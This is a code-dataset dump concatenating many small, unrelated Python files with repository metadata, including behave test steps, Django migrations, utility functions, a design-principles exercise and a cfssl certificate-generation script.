context.driver.find_element_by_id("id_password2").click()
@then('Spongebob gets "please fill out this field" alert in Password field')
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@step("Spongebob cicks on Password field")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@step('Spongbob enters password1 "{some_text}"')
def step_impl(context, some_text):
"""
:type context: behave.runner.Context
"""
element = context.driver.find_element_by_id("id_password1")
element.send_keys(some_text)
@step("Spongebob cicks on repeat Password field")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
context.driver.find_element_by_id("id_password2").click()
@step('Spongbob enters "CrabbyPatty2"')
def step_impl(context):
"""
:type context: behave.runner.Context
"""
pass
@step('Spongebob enters "BikiniBottoms"')
def step_impl(context):
"""
:type context: behave.runner.Context
"""
pass
@step("Spongebob clicks on password text field")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
pass
| 20.3125 | 76 | 0.667559 | 962 | 7,475 | 5.060291 | 0.14553 | 0.060394 | 0.094906 | 0.1553 | 0.753698 | 0.743016 | 0.734388 | 0.732539 | 0.714256 | 0.68673 | 0 | 0.002505 | 0.199064 | 7,475 | 367 | 77 | 20.367847 | 0.81059 | 0.216856 | 0 | 0.521127 | 0 | 0 | 0.307043 | 0.004414 | 0 | 0 | 0 | 0 | 0.169014 | 1 | 0.295775 | false | 0.126761 | 0.049296 | 0 | 0.34507 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
00e596517348806e59ad398839c517eddb40f8af | 160 | py | Python | src/python/zquantum/core/bitstring_distribution/distance_measures/__init__.py | alexjuda2/z-quantum-core | c258100dbd091f0b22495b77b36399426ae9abac | [
"Apache-2.0"
] | 24 | 2020-04-15T17:36:59.000Z | 2022-01-25T05:02:14.000Z | src/python/zquantum/core/bitstring_distribution/distance_measures/__init__.py | alexjuda2/z-quantum-core | c258100dbd091f0b22495b77b36399426ae9abac | [
"Apache-2.0"
] | 177 | 2020-04-23T15:19:59.000Z | 2022-03-30T18:06:17.000Z | src/python/zquantum/core/bitstring_distribution/distance_measures/__init__.py | alexjuda2/z-quantum-core | c258100dbd091f0b22495b77b36399426ae9abac | [
"Apache-2.0"
] | 19 | 2020-06-24T10:56:02.000Z | 2021-09-30T13:02:21.000Z | from .clipped_negative_log_likelihood import compute_clipped_negative_log_likelihood
from .mmd import compute_mmd, compute_multi_rbf_kernel, compute_rbf_kernel
| 53.333333 | 84 | 0.9125 | 23 | 160 | 5.782609 | 0.478261 | 0.225564 | 0.270677 | 0.421053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 160 | 2 | 85 | 80 | 0.886667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
daccc70213d30b044866b8ad1e7e4943af47ccd4 | 132 | py | Python | 1. First-Steps-in-Coding/Exercises/Solutions/triagle.py | nakov/Python-Course-SoftUni | b6036064c259adbdae4e2d87b67230b9cf9ddefc | [
"MIT"
] | 6 | 2017-06-09T17:45:28.000Z | 2020-03-31T11:59:39.000Z | 1. First-Steps-in-Coding/Exercises/Solutions/triagle.py | nakov/Python-Course-SoftUni | b6036064c259adbdae4e2d87b67230b9cf9ddefc | [
"MIT"
] | null | null | null | 1. First-Steps-in-Coding/Exercises/Solutions/triagle.py | nakov/Python-Course-SoftUni | b6036064c259adbdae4e2d87b67230b9cf9ddefc | [
"MIT"
] | 1 | 2019-07-02T11:26:00.000Z | 2019-07-02T11:26:00.000Z | print ("*\n**\n***\n****\n*****\n******\n*******\n********\n*********\n**********")
# for i in range (1, 10):
# print ("*" * i)
| 26.4 | 83 | 0.257576 | 18 | 132 | 1.888889 | 0.444444 | 0.470588 | 0.617647 | 0.705882 | 0.264706 | 0.264706 | 0.264706 | 0.264706 | 0 | 0 | 0 | 0.026316 | 0.136364 | 132 | 4 | 84 | 33 | 0.27193 | 0.318182 | 0 | 0 | 0 | 0 | 0.83908 | 0.83908 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 11 |
dad7ec862eebe9a4279472023d06b2ccfa7b2bc9 | 261 | py | Python | drift.py | janmtl/drift_qec | 3b1c703d151f9dc2833b761f85586cd09666557b | [
"0BSD"
] | null | null | null | drift.py | janmtl/drift_qec | 3b1c703d151f9dc2833b761f85586cd09666557b | [
"0BSD"
] | null | null | null | drift.py | janmtl/drift_qec | 3b1c703d151f9dc2833b761f85586cd09666557b | [
"0BSD"
] | null | null | null | from drift_qec.simulation import simulate_rates
# simulate_rates(error_rates=[0.2, 0.1], num_trials=2)
# simulate_rates(error_rates=[0.01, 0.005, 0.002, 0.001, 0.0005, 0.0002, 0.0001], num_trials=10)
simulate_rates(error_rates=[0.0002, 0.0001], num_trials=10)
| 43.5 | 96 | 0.754789 | 50 | 261 | 3.72 | 0.42 | 0.27957 | 0.290323 | 0.370968 | 0.607527 | 0.225806 | 0.225806 | 0 | 0 | 0 | 0 | 0.204167 | 0.08046 | 261 | 5 | 97 | 52.2 | 0.570833 | 0.563218 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
dafddbe94800555073ebd47ddb7902a544194142 | 66 | py | Python | preston/esi/__init__.py | feabell/Preston | e40e2c2ca82a232f2ca36a098921caae9561161c | [
"MIT"
] | null | null | null | preston/esi/__init__.py | feabell/Preston | e40e2c2ca82a232f2ca36a098921caae9561161c | [
"MIT"
] | null | null | null | preston/esi/__init__.py | feabell/Preston | e40e2c2ca82a232f2ca36a098921caae9561161c | [
"MIT"
] | null | null | null | from preston.esi.preston import *
from preston.esi.cache import *
| 22 | 33 | 0.787879 | 10 | 66 | 5.2 | 0.5 | 0.423077 | 0.538462 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 66 | 2 | 34 | 33 | 0.896552 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
9702c5af5525858c6638061366b8fd4b5931bdf3 | 6,531 | py | Python | wab/core/custom_column/migrations/0001_initial.py | BinNguyenVNN/wab-rest | daab9e176b5aae60cf822a19563f2e4bc1e02ca1 | [
"MIT"
] | null | null | null | wab/core/custom_column/migrations/0001_initial.py | BinNguyenVNN/wab-rest | daab9e176b5aae60cf822a19563f2e4bc1e02ca1 | [
"MIT"
] | 1 | 2020-12-17T13:51:12.000Z | 2020-12-17T13:51:12.000Z | wab/core/custom_column/migrations/0001_initial.py | BinNguyenVNN/wab-rest | daab9e176b5aae60cf822a19563f2e4bc1e02ca1 | [
"MIT"
] | 1 | 2021-05-18T12:30:53.000Z | 2021-05-18T12:30:53.000Z | # Generated by Django 3.0.11 on 2020-12-17 13:49
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='ValidationType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('time_created', models.DateTimeField(auto_now_add=True, null=True, verbose_name='Created on')),
('time_modified', models.DateTimeField(auto_now=True, null=True, verbose_name='Last modified on')),
('name', models.CharField(blank=True, max_length=255, null=True)),
('is_regex', models.BooleanField(default=False)),
('creator', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
related_name='custom_column_validationtype_creator',
to=settings.AUTH_USER_MODEL, verbose_name='Created by')),
('last_modified_by',
models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
related_name='custom_column_validationtype_last_modified',
to=settings.AUTH_USER_MODEL, verbose_name='Last modified by')),
],
options={
'db_table': 'validation_type',
},
),
migrations.CreateModel(
name='ValidationRegex',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('time_created', models.DateTimeField(auto_now_add=True, null=True, verbose_name='Created on')),
('time_modified', models.DateTimeField(auto_now=True, null=True, verbose_name='Last modified on')),
('name', models.CharField(blank=True, max_length=255, null=True)),
('creator', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
related_name='custom_column_validationregex_creator',
to=settings.AUTH_USER_MODEL, verbose_name='Created by')),
('last_modified_by',
models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
related_name='custom_column_validationregex_last_modified',
to=settings.AUTH_USER_MODEL, verbose_name='Last modified by')),
],
options={
'db_table': 'validation_regex',
},
),
migrations.CreateModel(
name='CustomColumnType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('time_created', models.DateTimeField(auto_now_add=True, null=True, verbose_name='Created on')),
('time_modified', models.DateTimeField(auto_now=True, null=True, verbose_name='Last modified on')),
('name', models.CharField(blank=True, max_length=255, null=True)),
('type', models.TextField(blank=True, null=True)),
('is_key', models.BooleanField(default=True)),
('creator', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
related_name='custom_column_customcolumntype_creator',
to=settings.AUTH_USER_MODEL, verbose_name='Created by')),
('last_modified_by',
models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
related_name='custom_column_customcolumntype_last_modified',
to=settings.AUTH_USER_MODEL, verbose_name='Last modified by')),
],
options={
'db_table': 'custom_column_type',
},
),
migrations.CreateModel(
name='ColumnValidation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('time_created', models.DateTimeField(auto_now_add=True, null=True, verbose_name='Created on')),
('time_modified', models.DateTimeField(auto_now=True, null=True, verbose_name='Last modified on')),
('name', models.CharField(blank=True, max_length=255, null=True)),
('value', models.CharField(blank=True, max_length=255, null=True)),
('regex', models.CharField(blank=True, max_length=255, null=True)),
('is_protect', models.BooleanField(default=False)),
('creator', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
related_name='custom_column_columnvalidation_creator',
to=settings.AUTH_USER_MODEL, verbose_name='Created by')),
('custom_column_type',
models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
to='custom_column.CustomColumnType')),
('last_modified_by',
models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
related_name='custom_column_columnvalidation_last_modified',
to=settings.AUTH_USER_MODEL, verbose_name='Last modified by')),
('validation_regex',
models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
to='custom_column.ValidationRegex')),
('validation_type',
models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
to='custom_column.ValidationType')),
],
options={
'db_table': 'column_validation',
},
),
]
| 60.472222 | 115 | 0.572347 | 643 | 6,531 | 5.584759 | 0.121306 | 0.057923 | 0.066834 | 0.073517 | 0.829852 | 0.825397 | 0.825397 | 0.825397 | 0.825397 | 0.813144 | 0 | 0.007588 | 0.313888 | 6,531 | 107 | 116 | 61.037383 | 0.793796 | 0.007043 | 0 | 0.584158 | 1 | 0 | 0.167669 | 0.063088 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.029703 | 0 | 0.069307 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
97919e28f17c77969d3ea009fbebd48dd3e51dab | 2,030 | py | Python | src/scribe_data/load/update_utils.py | andrewtavis/CC0-Mockups | 36020ff94c1ba34e5801ff405a0d42686ee044a1 | [
"CC0-1.0"
] | null | null | null | src/scribe_data/load/update_utils.py | andrewtavis/CC0-Mockups | 36020ff94c1ba34e5801ff405a0d42686ee044a1 | [
"CC0-1.0"
] | null | null | null | src/scribe_data/load/update_utils.py | andrewtavis/CC0-Mockups | 36020ff94c1ba34e5801ff405a0d42686ee044a1 | [
"CC0-1.0"
] | null | null | null | """
Data Utils
----------
Utility functions for data updates.
"""
def get_path_from_format_file():
"""
Returns the directory path from a data formatting file to scribe-org.
"""
return "../../../../../.."
def get_path_from_update_data():
"""
Returns the directory path from update_data.py to scribe-org.
"""
return "../../../.."
def get_ios_data_path(language: str, word_type: str):
"""
Returns the path to the data json of the iOS app given a language and word type.
Parameters
----------
language : str
The language the path should be returned for.
word_type : str
The type of word that should be accessed in the path.
Retruns
-------
The path to the data json for the given language and word type.
"""
return f"/Scribe-iOS/Keyboards/LanguageKeyboards/{language}/Data/{word_type}.json"
def get_android_data_path(language: str, word_type: str):
"""
Returns the path to the data json of the Android app given a language and word type.
Parameters
----------
language : str
The language the path should be returned for.
word_type : str
The type of word that should be accessed in the path.
Retruns
-------
The path to the data json for the given language and word type.
"""
return (
f"/Scribe-Android/Keyboards/LanguageKeyboards/{language}/Data/{word_type}.json"
)
def get_desktop_data_path(language: str, word_type: str):
"""
Returns the path to the data json of the desktop app given a language and word type.
Parameters
----------
language : str
The language the path should be returned for.
word_type : str
The type of word that should be accessed in the path.
Retruns
-------
The path to the data json for the given language and word type.
"""
return f"/Scribe-Desktop/scribe/language_guis/{language}/data/{word_type}.json"
| 25.375 | 88 | 0.619704 | 276 | 2,030 | 4.456522 | 0.17029 | 0.097561 | 0.053659 | 0.058537 | 0.852846 | 0.789431 | 0.752033 | 0.752033 | 0.752033 | 0.660976 | 0 | 0 | 0.271429 | 2,030 | 79 | 89 | 25.696203 | 0.831643 | 0.607389 | 0 | 0 | 0 | 0 | 0.40429 | 0.358086 | 0 | 0 | 0 | 0 | 0 | 1 | 0.416667 | false | 0 | 0 | 0 | 0.833333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
97cf021e72afbc73cfc6431d29e5b50bcb7c34ad | 1,772 | py | Python | SOLID LAB/04_ISP/entertainment_system.py | borko81/SU_OOP_2021 | 8c38682bd4a2b032ca09f85b0a579be152223a59 | [
"MIT"
] | null | null | null | SOLID LAB/04_ISP/entertainment_system.py | borko81/SU_OOP_2021 | 8c38682bd4a2b032ca09f85b0a579be152223a59 | [
"MIT"
] | null | null | null | SOLID LAB/04_ISP/entertainment_system.py | borko81/SU_OOP_2021 | 8c38682bd4a2b032ca09f85b0a579be152223a59 | [
"MIT"
] | null | null | null | # class EntertainmentDevice:
# def connect_to_device_via_hdmi_cable(self, device): pass
#
# def connect_to_device_via_rca_cable(self, device): pass
#
# def connect_to_device_via_ethernet_cable(self, device): pass
#
# def connect_device_to_power_outlet(self, device): pass
#
from abc import ABC, abstractmethod
class RcaConector(ABC):
@abstractmethod
def connect_to_device_via_rca_cable(self, device):
pass
class HdmiConnector(ABC):
@abstractmethod
def connect_to_device_via_hdmi_cable(self, device):
pass
class EthernetConnector(ABC):
@abstractmethod
def connect_to_device_via_ethernet_cable(self, device):
pass
class PowerConnector(ABC):
@abstractmethod
def connect_device_to_power_outlet(self, device):
pass
class Television(RcaConector, HdmiConnector):
def connect_to_device_via_rca_cable(self, device):
pass
def connect_to_game_console(self, game_console):
self.connect_to_device_via_hdmi_cable(game_console)
def connect_to_device_via_hdmi_cable(self, device):
pass
class dvd_player(HdmiConnector, PowerConnector):
def connect_to_device_via_hdmi_cable(self, device):
pass
def connect_device_to_power_outlet(self, device):
pass
class GameConsole(Television, EthernetConnector):
def connect_to_device_via_rca_cable(self, device):
pass
def connect_to_router(self, router):
self.connect_to_device_via_ethernet_cable(router)
def connect_to_device_via_ethernet_cable(self, device):
pass
class Router(EthernetConnector, PowerConnector):
def connect_to_device_via_ethernet_cable(self, device):
pass
def connect_device_to_power_outlet(self, device):
pass
| 24.273973 | 66 | 0.743228 | 227 | 1,772 | 5.387665 | 0.132159 | 0.147179 | 0.183156 | 0.206051 | 0.748978 | 0.738348 | 0.668029 | 0.626329 | 0.626329 | 0.626329 | 0 | 0 | 0.188488 | 1,772 | 72 | 67 | 24.611111 | 0.850487 | 0.152935 | 0 | 0.682927 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.341463 | false | 0.292683 | 0.02439 | 0 | 0.560976 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
8ada2dd557654c476f4f3583a67fa5f55f1adb13 | 135 | py | Python | tests/mock_request.py | pekingPow/us-congress-pizza-flag-tracker | 9e23f4082a83a63c5ed71658cc8aab7d99ad2f01 | [
"CC0-1.0"
] | null | null | null | tests/mock_request.py | pekingPow/us-congress-pizza-flag-tracker | 9e23f4082a83a63c5ed71658cc8aab7d99ad2f01 | [
"CC0-1.0"
] | null | null | null | tests/mock_request.py | pekingPow/us-congress-pizza-flag-tracker | 9e23f4082a83a63c5ed71658cc8aab7d99ad2f01 | [
"CC0-1.0"
] | null | null | null | class mock_request:
mock_request_json = {}
@classmethod
def get_json(cls):
return mock_request.mock_request_json
| 16.875 | 45 | 0.696296 | 17 | 135 | 5.117647 | 0.529412 | 0.505747 | 0.344828 | 0.505747 | 0.597701 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.237037 | 135 | 7 | 46 | 19.285714 | 0.84466 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
8af264a3e799a254be8b4b84e540b9659091cac7 | 75 | py | Python | test/__init__.py | elyashiv3839/compare_objects | 22f40a7c91428623176dd68235b93c93efe22215 | [
"MIT"
] | null | null | null | test/__init__.py | elyashiv3839/compare_objects | 22f40a7c91428623176dd68235b93c93efe22215 | [
"MIT"
] | null | null | null | test/__init__.py | elyashiv3839/compare_objects | 22f40a7c91428623176dd68235b93c93efe22215 | [
"MIT"
] | null | null | null | from . import test_CompareObjects
from . import test_CompareObjectsWithInfo | 37.5 | 41 | 0.88 | 8 | 75 | 8 | 0.625 | 0.3125 | 0.4375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093333 | 75 | 2 | 41 | 37.5 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8af4aa4af57e35a9fa7d554d1c262ca010d3b2ba | 1,336 | py | Python | conf/mod_keyless/gencert.py | fate0/bfe | bb034bca3711dfaa93f5c6f8aa408a68be58db13 | [
"Apache-2.0"
] | 4 | 2020-08-07T01:51:47.000Z | 2022-02-01T01:08:21.000Z | conf/mod_keyless/gencert.py | fate0/bfe | bb034bca3711dfaa93f5c6f8aa408a68be58db13 | [
"Apache-2.0"
] | null | null | null | conf/mod_keyless/gencert.py | fate0/bfe | bb034bca3711dfaa93f5c6f8aa408a68be58db13 | [
"Apache-2.0"
] | null | null | null | #! /usr/bin/env python
import os
os.system("mkdir -p pub")
os.system("mkdir -p key")
os.system("cfssl gencert -initca json/ca_csr.json |cfssljson -bare ca")
print("generate keyless server client cert")
os.system('cfssl gencert -ca ca.pem -ca-key ca-key.pem -cn="www.keyless.com" -hostname="www.keyless.com" -config json/signing.json -profile client json/csr-ecdsa.json |cfssljson -bare client')
os.system('cfssl gencert -ca ca.pem -ca-key ca-key.pem -cn="www.keyless.com" -hostname="www.keyless.com" -config json/signing.json -profile server json/csr-ecdsa.json |cfssljson -bare server')
print("generate www certs")
for i in range(0, 10, 2):
domain = f"www.{i}.com"
os.system(f'cfssl gencert -ca ca.pem -ca-key ca-key.pem -cn="{domain}" -hostname="{domain}" -config json/signing.json -profile server json/csr-ecdsa.json |cfssljson -bare {domain}')
os.system(f'mv {domain}-key.pem key/{domain}.key')
os.system(f'mv {domain}.pem pub/{domain}.crt')
for i in range(1, 10, 2):
domain = f"www.{i}.com"
os.system(f'cfssl gencert -ca ca.pem -ca-key ca-key.pem -cn="{domain}" -hostname="{domain}" -config json/signing.json -profile server json/csr-rsa.json |cfssljson -bare {domain}')
os.system(f'mv {domain}-key.pem key/{domain}.key')
os.system(f'mv {domain}.pem pub/{domain}.crt')
os.system('rm *.csr') | 46.068966 | 192 | 0.693114 | 230 | 1,336 | 4.021739 | 0.213043 | 0.103784 | 0.058378 | 0.069189 | 0.755676 | 0.755676 | 0.724324 | 0.724324 | 0.724324 | 0.724324 | 0 | 0.006814 | 0.121257 | 1,336 | 29 | 193 | 46.068966 | 0.78109 | 0.015719 | 0 | 0.315789 | 1 | 0.210526 | 0.753612 | 0.073004 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.052632 | 0 | 0.052632 | 0.105263 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c11fe8345d245bd4037122e08febc68fd259ae0a | 123 | py | Python | docs/tests/E1132.py | mrfyda/codacy-pylint-python3 | e360f6c0407edebe274835d3a881d67e96adf8ba | [
"Apache-2.0"
] | 17 | 2016-01-26T13:30:04.000Z | 2022-03-06T21:11:42.000Z | docs/tests/E1132.py | mrfyda/codacy-pylint-python3 | e360f6c0407edebe274835d3a881d67e96adf8ba | [
"Apache-2.0"
] | 50 | 2019-08-14T16:14:45.000Z | 2022-03-31T11:00:50.000Z | docs/tests/E1132.py | mrfyda/codacy-pylint-python3 | e360f6c0407edebe274835d3a881d67e96adf8ba | [
"Apache-2.0"
] | 15 | 2015-11-18T12:18:50.000Z | 2021-01-17T22:21:41.000Z | ##Patterns: E1132
def test(a, b):
return a, b
test(1, 24)
test(1, b=24, **{})
##Err: E1132
test(1, b=24, **{'b': 24})
| 13.666667 | 26 | 0.520325 | 24 | 123 | 2.666667 | 0.416667 | 0.234375 | 0.1875 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.191919 | 0.195122 | 123 | 8 | 27 | 15.375 | 0.454545 | 0.203252 | 0 | 0 | 0 | 0 | 0.010638 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0.2 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 7 |
c18c32caf29b5794392c400b25240e853ca7b0f5 | 45 | py | Python | stackchat/cli/web/urls.py | jeremybanks/ChatExchange | e350de944d0f221a9b2afc545bf60ae309e402b6 | [
"Apache-2.0"
] | 3 | 2017-12-27T02:40:06.000Z | 2018-04-21T00:28:31.000Z | stackchat/cli/web/urls.py | jeremybanks/ChatExchange | e350de944d0f221a9b2afc545bf60ae309e402b6 | [
"Apache-2.0"
] | 1 | 2017-12-11T22:45:13.000Z | 2020-09-04T17:49:41.000Z | stackchat/cli/web/urls.py | jeremybanks/ChatExchange | e350de944d0f221a9b2afc545bf60ae309e402b6 | [
"Apache-2.0"
] | 1 | 2018-05-08T22:17:58.000Z | 2018-05-08T22:17:58.000Z | from .views import _get_routes as get_routes
| 22.5 | 44 | 0.844444 | 8 | 45 | 4.375 | 0.75 | 0.514286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 45 | 1 | 45 | 45 | 0.897436 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c18ef8af6f5917b2d6cd69fc41c157598e307b38 | 92 | py | Python | utils/tokens.py | devbas/aml-quora | da343ff3499566da082e12329e6228a1d9b34a7a | [
"MIT"
] | null | null | null | utils/tokens.py | devbas/aml-quora | da343ff3499566da082e12329e6228a1d9b34a7a | [
"MIT"
] | null | null | null | utils/tokens.py | devbas/aml-quora | da343ff3499566da082e12329e6228a1d9b34a7a | [
"MIT"
] | null | null | null | from nltk.tokenize import word_tokenize
def word_tokens(row):
return word_tokenize(row) | 23 | 39 | 0.804348 | 14 | 92 | 5.071429 | 0.642857 | 0.338028 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 92 | 4 | 40 | 23 | 0.8875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
c1a9588eaee780b3d914eb6e41f8a16e3c667a07 | 1,416 | py | Python | dietgenerator/migrations/0004_auto_20201121_1752.py | sgdiosdado/diet-generator | b79cd16a3ef2bbece526892fd30e0e3ba33bc0bf | [
"MIT"
] | null | null | null | dietgenerator/migrations/0004_auto_20201121_1752.py | sgdiosdado/diet-generator | b79cd16a3ef2bbece526892fd30e0e3ba33bc0bf | [
"MIT"
] | null | null | null | dietgenerator/migrations/0004_auto_20201121_1752.py | sgdiosdado/diet-generator | b79cd16a3ef2bbece526892fd30e0e3ba33bc0bf | [
"MIT"
] | null | null | null | # Generated by Django 3.1.3 on 2020-11-21 17:52
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dietgenerator', '0003_auto_20201121_1748'),
]
operations = [
migrations.AlterField(
model_name='food',
name='calories',
field=models.DecimalField(blank=True, decimal_places=2, max_digits=8, null=True),
),
migrations.AlterField(
model_name='food',
name='carbohidrates',
field=models.DecimalField(blank=True, decimal_places=2, max_digits=5, null=True),
),
migrations.AlterField(
model_name='food',
name='cholesterol',
field=models.DecimalField(blank=True, decimal_places=2, max_digits=5, null=True),
),
migrations.AlterField(
model_name='food',
name='fats',
field=models.DecimalField(blank=True, decimal_places=2, max_digits=5, null=True),
),
migrations.AlterField(
model_name='food',
name='protein',
field=models.DecimalField(blank=True, decimal_places=2, max_digits=5, null=True),
),
migrations.AlterField(
model_name='food',
name='sodium',
field=models.DecimalField(blank=True, decimal_places=2, max_digits=5, null=True),
),
]
